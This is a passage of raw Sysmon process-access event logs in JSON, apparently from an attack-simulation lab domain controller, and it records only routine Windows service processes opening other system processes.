C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6372,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6373,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6374,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6375,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1260\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-0010C4AB0900}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1260","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-0010C4AB0900}","TargetProcessId":"3716","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6376,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-0010C4AB0900}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-0010C4AB0900}","TargetProcessId":"3716","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6377,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6378,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6379,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 